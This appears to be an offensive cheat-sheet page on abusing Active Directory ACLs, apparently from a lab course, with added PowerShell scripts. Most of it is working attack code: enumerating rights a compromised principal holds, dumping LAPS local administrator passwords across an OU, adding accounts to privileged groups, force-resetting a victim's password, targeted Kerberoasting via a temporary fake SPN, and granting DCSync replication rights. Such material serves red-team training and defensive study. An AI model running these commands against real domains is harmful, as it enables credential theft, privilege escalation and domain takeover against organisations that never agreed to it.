ACL Abuse
Enumeration
# Import
Import-Module C:\ADModule\Microsoft.ActiveDirectory.Management.dll
Import-Module C:\ADModule\ActiveDirectory\ActiveDirectory.psd1
# Get the DistinguishedName of the target (Get-ADUser returns it by default)
Get-ADUser -Identity USER
# List the ACEs on that user's object: IdentityReference is who holds the right,
# ActiveDirectoryRights is what they hold, ObjectType narrows it to one attribute/extended right
(Get-Acl 'AD:\CN=USER,CN=Users,DC=it,DC=gcb,DC=local').Access
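Reading one object's ACL tells you who has rights over it; the question an attacker usually has is the reverse, which objects a compromised principal has rights over. The following is an added example, not code from the original page: it walks every object in the domain with the AD module, keeps the Allow ACEs whose IdentityReference is the principal you control, and resolves ObjectType GUIDs to names so an ExtendedRight on the ms-Mcs-AdmPwd attribute (LAPS) or on a replication right reads as such instead of as a raw GUID. The principal name and the assumption that the AD module (with its AD: drive) is already imported are mine.

```powershell
# Added example, not from the original page.
# Assumes the ActiveDirectory module (or the ADModule copy) is imported and AD: is available.
$Principal = 'IT\studentuser'   # assumed: DOMAIN\user or DOMAIN\group whose rights we want to find

$Domain  = Get-ADDomain
$RootDSE = Get-ADRootDSE

# Build GUID -> name map from the schema (attributes/classes) and the extended-rights container,
# so ObjectType GUIDs on property/ExtendedRight ACEs become readable (e.g. ms-Mcs-AdmPwd).
$GuidMap = @{}
Get-ADObject -SearchBase $RootDSE.SchemaNamingContext -LDAPFilter '(schemaIDGUID=*)' -Properties name, schemaIDGUID |
    ForEach-Object { $GuidMap[[guid]$_.schemaIDGUID] = $_.name }
Get-ADObject -SearchBase "CN=Extended-Rights,$($RootDSE.ConfigurationNamingContext)" `
    -LDAPFilter '(objectClass=controlAccessRight)' -Properties name, rightsGUID |
    ForEach-Object { $GuidMap[[guid]$_.rightsGUID] = $_.name }

# Walk every object in the domain and keep only Allow ACEs granted to $Principal.
# An empty ObjectType (all-zero GUID) means the right applies to the whole object.
Get-ADObject -SearchBase $Domain.DistinguishedName -Filter * |
    ForEach-Object {
        $dn = $_.DistinguishedName
        (Get-Acl -Path "AD:\$dn").Access |
            Where-Object { $_.IdentityReference.Value -eq $Principal -and $_.AccessControlType -eq 'Allow' } |
            ForEach-Object {
                $type = if ($_.ObjectType -eq [guid]::Empty) { 'All' }
                        elseif ($GuidMap.ContainsKey($_.ObjectType)) { $GuidMap[$_.ObjectType] }
                        else { $_.ObjectType.ToString() }
                [pscustomobject]@{
                    Object     = $dn
                    Rights     = $_.ActiveDirectoryRights
                    ObjectType = $type
                    Inherited  = $_.IsInherited
                }
            }
    } | Format-Table -AutoSize
```

This only matches ACEs granted directly to the named principal; rights inherited through group membership show up under the group's name, so run it once per group the user belongs to (or filter on a list). Expect it to take a while in a large domain since it binds to every object.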
ReadProperty, ExtendedRight over OU / Computer Object
Most likely LAPS. ms-Mcs-AdmPwd is a confidential attribute, so reading it needs the ExtendedRight (CONTROL_ACCESS) flag and the ACE's ObjectType is the ms-Mcs-AdmPwd schema GUID. The principal in IdentityReference can read the LAPS local administrator password in cleartext for every computer under that OU.
# Import module
Import-Module C:\AD\Tools\AdmPwd.PS\AdmPwd.PS.psd1
# Find the OUs that can read LAPS passwords
Find-AdmPwdExtendedRights -Identity <OU>
# Once we have compromised a user that can read LAPS, read the password of a machine in that OU
Get-AdmPwdPassword -ComputerName <targetmachine>
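The AdmPwd.PS module is not required to read the password; it is an ordinary (confidential) attribute on the computer object. The following is an added example, not from the original page, that dumps the LAPS password and its expiry for every computer under an OU using only the AD module. The OU path is an assumption. Because ms-Mcs-AdmPwd is confidential, a principal without the ExtendedRight simply does not get the attribute back rather than getting an error, which is why the filter on an empty value is there.

```powershell
# Added example, not from the original page. Assumes the AD module is imported and the
# current user holds ReadProperty + ExtendedRight on ms-Mcs-AdmPwd for the OU.
$OU = 'OU=Servers,DC=it,DC=gcb,DC=local'   # assumed OU that the ACE was found on

Get-ADComputer -SearchBase $OU -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime |
    # Confidential attribute: it is silently absent when we lack the right, so drop those rows
    Where-Object { $_.'ms-Mcs-AdmPwd' } |
    Select-Object Name,
        @{ n = 'Password'; e = { $_.'ms-Mcs-AdmPwd' } },
        # Expiration is stored as a FILETIME (Int64), convert it to a readable UTC timestamp
        @{ n = 'ExpiresUtc'; e = { [datetime]::FromFileTimeUtc([long]$_.'ms-Mcs-AdmPwdExpirationTime') } } |
    Format-Table -AutoSize
```

If a computer shows up in Get-ADComputer but not in this output, the OU right does not cover it (for example it sits in a child OU with inheritance blocked), or the ACE grants ReadProperty without the ExtendedRight flag.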
WriteProperty | Self-Membership | GenericAll over Group
Can add members to the group. WriteProperty (on the member attribute) and GenericAll let us add any account; Self-Membership is the validated write on member, which only allows adding our own account.
# Add
Add-ADGroupMember -Identity "LocalAdmins" -Members USERS
# Check
Get-ADGroupMember -Identity "LocalAdmins"
GenericWrite | GenericAll | WriteProperty over Computer Object
Can perform a Resource Based Constrained Delegation attack: write msDS-AllowedToActOnBehalfOfOtherIdentity on the target computer so that a machine account we control may impersonate any user to it (S4U2Self + S4U2Proxy).
GenericAll over User Object
Can reset the user's password without knowing the old one (a force reset, not a change). The user will notice, so this is the noisy option; GenericAll also covers writing any other attribute of the user.
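The following is an added example, not from the original page, and it goes slightly beyond the text: it shows the password reset with the AD module and, as a quieter alternative that the same GenericAll permits, a targeted Kerberoast by temporarily adding an SPN to the user and removing it afterwards. The user name, password and SPN value are assumptions.

```powershell
# Added example, not from the original page. Assumes the AD module is imported and that we
# hold GenericAll over the user object.
$Victim = 'USER'   # assumed target user

# Option 1: force a password reset. -Reset means the old password is not required.
# The target loses access with their old password, so this is visible to them.
$NewPassword = ConvertTo-SecureString 'Summer2024!Reset' -AsPlainText -Force   # assumed value
Set-ADAccountPassword -Identity $Victim -Reset -NewPassword $NewPassword
# Confirm the reset took effect
Get-ADUser -Identity $Victim -Properties PasswordLastSet | Select-Object Name, PasswordLastSet

# Option 2 (same right, less disruptive): targeted Kerberoast. GenericAll includes
# WriteProperty on servicePrincipalName, so add a fake SPN, request a TGS for it with any
# Kerberoasting tool (external, not shown), then remove the SPN again.
$FakeSpn = 'HTTP/fake-svc.it.gcb.local'   # assumed, must be unique in the forest
Set-ADUser -Identity $Victim -ServicePrincipalNames @{ Add = $FakeSpn }
Get-ADUser -Identity $Victim -Properties servicePrincipalName | Select-Object -ExpandProperty servicePrincipalName
# ... request and crack the TGS offline ...
Set-ADUser -Identity $Victim -ServicePrincipalNames @{ Remove = $FakeSpn }
```

Option 2 only helps if the user's password is crackable; option 1 always works but leaves the account unusable for its owner and a password-reset event on the domain controller.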
WriteDACL over Domain Object
WriteDACL on the domain head (DC=techcorp,DC=local, not a domain controller computer object) lets us grant any principal the three replication extended rights (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All, DS-Replication-Get-Changes-In-Filtered-Set), i.e. DCSync. Set-ADACL below is from the RACE toolkit, not the AD module.
Set-ADACL -SamAccountName USER -DistinguishedName 'DC=techcorp,DC=local' -GUIDRight DCSync -Server techcorp.local -Verbose